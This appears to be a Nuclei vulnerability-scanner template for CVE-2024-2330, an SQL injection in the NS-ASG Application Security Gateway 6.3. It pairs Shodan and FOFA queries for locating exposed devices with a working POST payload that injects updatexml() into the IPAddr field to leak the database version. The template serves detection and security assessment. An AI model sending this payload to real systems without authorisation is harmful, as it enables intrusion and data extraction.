id: CVE-2024-2330

info:
  name: NS-ASG Application Security Gateway 6.3 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  impact: |
    Authenticated attackers can extract sensitive database information via SQL injection in the NS-ASG Application Security Gateway.
  remediation: |
    Update NS-ASG Application Security Gateway to a version newer than 6.3.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2330
    - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md
    - https://vuldb.com/?ctiid.256281
    - https://vuldb.com/?id.256281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-2330
    cwe-id: CWE-89
    epss-score: 0.17761
    epss-percentile: 0.9678
  metadata:
    max-request: 2
    shodan-query: http.title:“NS-ASG”
    fofa-query: app="网康科技-NS-ASG安全网关"
  tags: cve,cve2024,ns-asg,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /protocol/index.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '([~0-9.]+)'"
# digest: 4a0a004730450220664e93f35194caf238ddacb7d1a478c44ebb0578e0e0377cd50d2652df643d19022100a101557de270f0acfe322471453b9bd959aff5b0057d42b6a7b654611b772aba:922c64590222798bb761d5b6d8e72950